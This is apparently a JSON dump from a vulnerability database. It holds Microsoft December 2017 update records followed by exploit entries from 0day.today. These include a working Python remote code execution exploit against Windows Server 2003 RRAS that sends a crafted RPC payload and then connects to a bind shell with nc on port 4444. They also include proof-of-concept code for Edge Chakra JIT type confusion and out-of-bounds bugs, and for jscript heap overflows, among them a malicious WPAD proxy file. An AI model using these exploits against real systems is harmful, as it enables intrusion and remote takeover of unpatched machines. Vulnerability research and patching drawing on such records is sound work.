"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4054517", "href": "https://support.microsoft.com/en-us/help/4054517", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T10:37:02", "description": "None\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update KB4051034 (released November 27, 2017) and addresses the following issues:\n\n * Addresses issue where users of SQL Server Reporting Services may not be able to use 
the scrollbar in a drop-down list.\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine and Windows Server.\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054518>) website.**File information**For a list of the files that are provided in this update, download the [file information for update 4054518](<http://download.microsoft.com/download/2/8/5/285E8722-C448-4437-9584-FDBF8A5E388A/4054518.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054518 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4054518", "href": "https://support.microsoft.com/en-us/help/4054518", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:30", "description": "None\n## Improvements and fixes\n\nThis update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Updates Internet Explorer\u2019s default visibility for the button that launches Microsoft Edge.\n * Addresses issue where users of SQL Server Reporting Services may not be able to use the scrollbar in a drop-down list.\n * Addresses issue that caused Windows Pro devices on the Current Branch for Business (CBB) to upgrade unexpectedly.\n * Addresses issue where applications may stop responding for customers who have internet or web proxies enabled using PAC script configurations. This is a result of a reentrancy deadlock in WinHTTP.dll. This can result in the following:\n * Microsoft Outlook can't connect to Microsoft Office365.\n * Internet Explorer and Microsoft Edge can't render any content (including local computer content, local network content, or web content).\n * Cisco Jabber stops responding, which blocks messaging and telephony features.\n * Any application or service that relies on WinHTTP is affected.\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine, Microsoft Edge, and Windows Server.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>)_._\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from 
Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4053580>) website.**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4053580](<http://download.microsoft.com/download/F/6/8/F68D177A-C312-4895-AD9C-6DB924869604/4053580.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4053580 (OS Build 15063.786)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4053580", "href": "https://support.microsoft.com/en-us/help/4053580", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T10:37:04", "description": "None\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update KB4050945(released November 27, 2017) and addresses the following issues:\n\n * Addresses additional issues with updated time zone information.\n * 
Security updates to the Microsoft Scripting Engine and Windows Server.\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054520>) website.**File information**For a list of the files that are provided in this update, download the [file information for update 4054520](<http://download.microsoft.com/download/3/5/B/35B4D68F-E9C9-47FF-B279-1F3BC449B5D4/4054520.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054520 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11901"], "modified": "2017-12-12T08:00:00", "id": "KB4054520", "href": 
"https://support.microsoft.com/en-us/help/4054520", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-05-14T02:41:57", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2018-05-13T00:00:00", "type": "zdt", "title": "Microsoft Windows 2003 SP2 - RRAS SMB Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11885"], "modified": "2018-05-13T00:00:00", "id": "1337DAY-ID-30343", "href": "https://0day.today/exploit/description/30343", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled.\r\n \r\n#The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure.\r\n#dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution.\r\n#Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using \r\n#Windows Server 2003.\r\n \r\n#Exploit created by: V\u00edctor Portal\r\n#For learning purpose only\r\n \r\nimport struct\r\nimport sys\r\nimport time\r\nimport os\r\n \r\nfrom threading import Thread \r\n \r\nfrom impacket import smb\r\nfrom impacket import uuid\r\nfrom impacket import dcerpc\r\nfrom impacket.dcerpc.v5 import transport\r\n \r\ntarget = sys.argv[1]\r\n \r\nprint '[-]Initiating connection'\r\ntrans = transport.DCERPCTransportFactory('ncacn_np:%s[\\\\pipe\\\\browser]' % target)\r\ntrans.connect()\r\n \r\nprint '[-]connected to ncacn_np:%s[\\\\pipe\\\\browser]' % target\r\ndce = trans.DCERPC_class(trans)\r\n \r\n#RRAS DCE-RPC endpoint\r\ndce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))\r\n \r\n#msfvenom 
-a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b \"\\x00\" -f python\r\nbuf = \"\"\r\n \r\n#NDR format\r\nstub = \"\\x21\\x00\\x00\\x00\" #dwPid = PID_IP (IPv4)\r\nstub += \"\\x10\\x27\\x00\\x00\" #dwRoutingPID\r\nstub += \"\\xa4\\x86\\x01\\x00\" #dwMibInEntrySize \r\nstub += \"\\x41\"*4 #_MIB_OPAQUE_QUERY pointer\r\nstub += \"\\x04\\x00\\x00\\x00\" #dwVarID (_MIB_OPAQUE_QUERY)\r\nstub += \"\\x41\"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)\r\nstub += \"\\xa4\\x86\\x01\\x00\" #dwMibOutEntrySize \r\nstub += \"\\xad\\x0b\\x2d\\x06\" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)\r\nstub += \"\\xd0\\xba\\x61\\x41\\x41\" + \"\\x90\"*5 + buf + \"\\x41\"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)\r\nstub += \"\\x04\\x00\\x00\\x00\" #dwId (_MIB_OPAQUE_INFO)\r\nstub += \"\\x41\"*4 #ullAlign (_MIB_OPAQUE_INFO)\r\n \r\n \r\ndce.call(0x1e, stub) #0x1d MIBEntryGetFirst (other RPC calls are also affected)\r\nprint \"[-]Exploit sent to target successfully...\"\r\n \r\nprint \"Waiting for shell...\"\r\ntime.sleep(5)\r\nos.system(\"nc \" + target + \" 4444\")\n\n# 0day.today [2018-05-14] #", "sourceHref": "https://0day.today/exploit/30343", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-01T19:35:09", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra JIT - Escape Analysis Bug Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11918"], "modified": "2018-01-09T00:00:00", "id": "1337DAY-ID-29410", "href": "https://0day.today/exploit/description/29410", "sourceData": 
"/*\r\nEscape analysis: https://en.wikipedia.org/wiki/Escape_analysis\r\n \r\nChakra fails to detect if \"tmp\" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.\r\n \r\nPoC:\r\n*/\r\n \r\nfunction opt() {\r\n let tmp = [];\r\n tmp[0] = tmp;\r\n return tmp[0];\r\n}\r\n \r\nfunction main() {\r\n for (let i = 0; i < 0x1000; i++) {\r\n opt();\r\n }\r\n \r\n print(opt()); // deref uninitialized stack pointers!\r\n}\r\n \r\nmain();\n\n# 0day.today [2018-03-01] #", "sourceHref": "https://0day.today/exploit/29410", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-19T05:16:06", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra JIT - Op_MaxInAnArray and Op_MinInAnArray can Explicitly call User-Defined Jav", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11893"], "modified": "2018-01-09T00:00:00", "id": "1337DAY-ID-29407", "href": "https://0day.today/exploit/description/29407", "sourceData": "/*\r\n1. Call patterns like \"Math.max.apply(Math, [1, 2, 3, 4, 5])\" and \"Math.max.apply(Math, arr)\" can be optimized to directly call the method \"JavascriptMath::MaxInAnArray\" in the Inline Phase.\r\n2. The method takes the original method \"Math.max\" as the first parameter and the arguments object as the second parameter.\r\n3. If the arguments object can't be handled by the method, it explicitly calls the original method \"Math.max\".\r\n4. 
But it doesn't check if the property \"Math.max\" has changed, so a user defined JavaScript function can be called without updating \"ImplicitCallFlags\".\r\n \r\nNote: Math.min as well.\r\n \r\nPoC:\r\n*/\r\n \r\nfunction opt(arr, arr2) {\r\n arr[0] = 1.1;\r\n Math.max.apply(Math, arr2);\r\n arr[0] = 2.3023e-320;\r\n}\r\n \r\nfunction main() {\r\n let arr = [1.1, 2.2, 3.3, 4.4];\r\n for (let i = 0; i < 10000; i++) {\r\n opt(arr, [1, 2, 3, 4]);\r\n }\r\n \r\n Math.max = function () {\r\n arr[0] = {};\r\n };\r\n \r\n opt(arr, {}); // can't handle, calls Math.max\r\n print(arr[0]);\r\n}\r\n \r\nmain();\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/29407", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-14T15:44:00", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-12-19T00:00:00", "type": "zdt", "title": "Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11906"], "modified": "2017-12-19T00:00:00", "id": "1337DAY-ID-29262", "href": "https://0day.today/exploit/description/29262", "sourceData": "Windows: out-of-bounds read in jscript!RegExpFncObj::LastParen \r\n\r\nCVE-2017-11906\r\n\r\n\r\nThere is an out-of-bounds read in the jscript.dll library (used in IE, WPAD and other places):\r\n\r\nPoC for IE (note: page heap might be required to observe the crash):\r\n\r\n=========================================\r\n\r\n<!-- saved from url=(0014)about:internet -->\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\n\r\nfunction go() {\r\n var r= new RegExp(Array(100).join('()'));\r\n ''.search(r);\r\n alert(RegExp.lastParen);\r\n}\r\n\r\ngo();\r\n\r\n</script>\r\n\r\n=========================================\r\n\r\nDebug 
log:\r\n\r\n=========================================\r\n\r\n(cec.a14): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\njscript!RegExpFncObj::LastParen+0x43:\r\n000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????\r\n\r\n0:014> r\r\nrax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063\r\nrdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0\r\nrip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148\r\n r8=00000000130f9210 r9=0000000000000000 r10=000000000463fef0\r\nr11=000000000463ff38 r12=0000000000000083 r13=0000000000000000\r\nr14=00000000130f9210 r15=0000000000000000\r\niopl=0 nv up ei pl nz na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206\r\njscript!RegExpFncObj::LastParen+0x43:\r\n000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????\r\n\r\n0:014> k\r\n # Child-SP RetAddr Call Site\r\n00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43\r\n01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5\r\n02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873\r\n03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373\r\n04 00000000`130fa180 
000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3\r\n06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea\r\n07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6\r\n08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7\r\n0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e\r\n0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a\r\n0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267\r\n0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56\r\n0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1\r\n0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f\r\n10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9\r\n11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283\r\n12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101\r\n13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235\r\n14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90\r\n15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb\r\n16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f\r\n17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70\r\n18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1\r\n19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43\r\n1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41\r\n1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240\r\n1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150\r\n1d 00000000`130fc250 00000000`771f98c2 
USER32!UserCallWinProcCheckWow+0x1ad\r\n1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5\r\n1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555\r\n20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3\r\n21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f\r\n22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f\r\n23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd\r\n24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d\r\n\r\n=========================================\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: ifratric\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29262", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-02-20T05:28:34", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra JIT - BackwardPass::RemoveEmptyLoopAfterMemOp Does not Insert Branches", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11909"], "modified": "2018-01-09T00:00:00", "id": "1337DAY-ID-29408", "href": "https://0day.today/exploit/description/29408", "sourceData": "/*\r\nThe optimizations for memory operations may leave empty loops as follows:\r\n \r\nfor (let i = 0; i < arr.length; i++) {\r\n arr[i] = 0;\r\n}\r\n \r\nBecomes:\r\n \r\nMemset(arr, 0, arr.length);\r\nfor (let i = 0; i < arr.length; i++) {\r\n // empty!\r\n}\r\n \r\nThese empty loops will be removed by \"BackwardPass::RemoveEmptyLoopAfterMemOp\". 
But this method just removes them without considering branches.\r\n \r\nHere's what may happen.\r\n \r\nA:\r\nMemset(arr, 0, arr.length);\r\n \r\nfor (let i = 0; i < arr.length; i++) {\r\n \r\n}\r\ngoto D; // Actually, this's a \"BrGe_I4\" instruction in the PoC.\r\n \r\nC:\r\n...\r\n \r\nD:\r\n...\r\n \r\nBecomes:\r\n \r\nA:\r\nMemset(arr, 0, arr.length);\r\n \r\nC:\r\n...\r\n \r\nD:\r\n...\r\n \r\nSo, this may break the control flow.\r\n \r\n \r\nPoC:\r\n*/\r\n \r\nfunction opt(a, b, always_true = true) {\r\n a[0] = 1234;\r\n b[0] = 0;\r\n \r\n let arr = a;\r\n if (always_true) {\r\n arr = b;\r\n for (let i = 0; i < arr.length; i++)\r\n arr[i] = 0;\r\n }\r\n \r\n let val = arr[0];\r\n if (val) {\r\n print(val); // Must be 0, but prints out 1234\r\n return true;\r\n }\r\n \r\n return false;\r\n}\r\n \r\nlet a = new Uint32Array(1);\r\nlet b = new Uint32Array(0x1000);\r\nfor (let i = 0; i < 10000; i++) {\r\n if (opt(a, b)) {\r\n break;\r\n }\r\n}\n\n# 0day.today [2018-02-20] #", "sourceHref": "https://0day.today/exploit/29408", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-04T03:40:43", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra asm.js Out-of-Bounds Read Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11911"], "modified": "2018-01-09T00:00:00", "id": "1337DAY-ID-29409", "href": "https://0day.today/exploit/description/29409", "sourceData": "/*\r\nHere's a snippet of AsmJSByteCodeGenerator::EmitAsmJsFunctionBody.\r\n AsmJsVar * initSource = nullptr;\r\n if (decl->sxVar.pnodeInit->nop == knopName)\r\n {\r\n AsmJsSymbol * initSym = mCompiler->LookupIdentifier(decl->sxVar.pnodeInit->name(), mFunction);\r\n if (initSym->GetSymbolType() == AsmJsSymbol::Variable)\r\n {\r\n // in this case we are initializing with value of a constant var\r\n initSource = 
initSym->Cast<AsmJsVar>();\r\n }\r\n ...\r\n }\r\n ...\r\n if (initSource)\r\n {\r\n if (var->GetType().isDouble())\r\n {\r\n mWriter.AsmReg2(Js::OpCodeAsmJs::Ld_Db, var->GetLocation(), mFunction->GetConstRegister<double>(initSource->GetDoubleInitialiser()));\r\n }\r\n \r\nChakra thinks the PoC is valid asm.js code. What happens when the variable \"b\" gets initialized is:\r\n1. mCompiler->LookupIdentifier is called with \"a\" as the first argument. And it returns the local variable \"a\", which is of type int, but not the double constant \"a\".\r\n2. mFunction->GetConstRegister fails to find the int value in the double constant table. So it returns -1 which leads OOB read.\r\n \r\nPoC:\r\n*/\r\n \r\nfunction createModule() {\r\n 'use asm';\r\n const a = 1.0;\r\n function f() {\r\n var b = a;\r\n var a = 0;\r\n }\r\n \r\n return f;\r\n}\r\nvar f = createModule();\r\nf();\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/29409", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-13T05:47:59", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2018-01-18T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra - JavascriptGeneratorFunction::GetPropertyBuiltIns Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11914"], "modified": "2018-01-18T00:00:00", "id": "1337DAY-ID-29568", "href": "https://0day.today/exploit/description/29568", "sourceData": "/*\r\nHere's a snippet of the method.\r\nbool JavascriptGeneratorFunction::GetPropertyBuiltIns(Var originalInstance, PropertyId propertyId, Var* value, PropertyValueInfo* info, ScriptContext* requestContext, BOOL* result)\r\n{\r\n if (propertyId == PropertyIds::length)\r\n {\r\n ...\r\n int len = 0;\r\n Var varLength;\r\n if (scriptFunction->GetProperty(scriptFunction, PropertyIds::length, &varLength, NULL, requestContext))\r\n {\r\n len = 
JavascriptConversion::ToInt32(varLength, requestContext);\r\n }\r\n ...\r\n return true;\r\n }\r\n \r\n return false;\r\n}\r\n \r\n\"JavascriptGeneratorFunction\" is like a wrapper class used to ensure the arguments for \"scriptFunction\". So \"scriptFunction\" must not be exposed to user JavaScript code. But the vulnerable method exposes \"scriptFunction\" as \"this\" when getting the \"length\" property.\r\n \r\nThe code should be like: \"scriptFunction->GetProperty(this, PropertyIds::length, &varLength, NULL, requestContext);\"\r\n \r\nType confusion PoC:\r\n*/\r\n \r\nfunction* f() {\r\n}\r\n \r\nlet g;\r\nf.__defineGetter__('length', function () {\r\n g = this; // g == \"scriptFunction\"\r\n});\r\n \r\n \r\nf.length;\r\n \r\ng.call(0x1234, 0x5678); // type confusion\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/29568", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-02T01:36:24", "description": "There is a heap overflow in jscript.dll when compiling a regex. This issue could potentially be exploited through multiple vectors.", "cvss3": {}, "published": "2017-12-19T00:00:00", "type": "zdt", "title": "Microsoft Windows jscript!RegExpComp::Compile Heap Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11890"], "modified": "2017-12-19T00:00:00", "id": "1337DAY-ID-29263", "href": "https://0day.today/exploit/description/29263", "sourceData": "Windows: Heap overflow in jscript!RegExpComp::Compile through IE or local network via WPAD \r\n\r\nCVE-2017-11890\r\n\r\n\r\nThere is a heap overflow in jscript.dll when compiling a regex. This issue could potentially be exploited through multiple vectors:\r\n\r\n - An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. 
This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.\r\n\r\n - The issue can also be exploited by opening a malicious web page in Internet Explorer. In this case, due to the sizes involved, a 64-bit tab process would most likely be required to trigger the issue. This is going to be the case for example when running IE in the Enhanced Protected Mode.\r\n\r\nThe issue has been verified on 64-bit Win7 and 64-bit Win10 with the most recent patches applied.\r\n\r\nPoC for Internet Explorer:\r\n\r\n============================================\r\n\r\n<!-- saved from url=(0014)about:internet -->\r\n<html>\r\n<head>\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n</head>\r\n<body>\r\n<script language=\"Jscript.Encode\">\r\n\r\nvar s = 'a';\r\nfor(var i=0;i<28;i++) {\r\n s = s+s;\r\n}\r\ns = s+'[a-z]'+s;\r\n\r\nr = new RegExp();\r\nr.compile(s);\r\n\r\n</script>\r\n</body>\r\n</html>\r\n\r\n============================================\r\n\r\nPoC for WPAD:\r\n\r\n============================================\r\n\r\nfunction FindProxyForURL(url, host) {\r\n\r\n var s = 'a';\r\n for(var i=0;i<28;i++) {\r\n s = s+s;\r\n }\r\n s = s+'[a-z]'+s;\r\n\r\n r = new RegExp();\r\n r.compile(s);\r\n\r\n return \"DIRECT\";\r\n}\r\n\r\n===========================================\r\n\r\nTechnical details:\r\n\r\nThe issue is in RegExpComp::Compile (and several functions called from RegExpComp::Compile). RegExpComp::Compile is responsible for compiling a RegExp object. It maintains a buffer with the compilation result and extends it when necessary. 
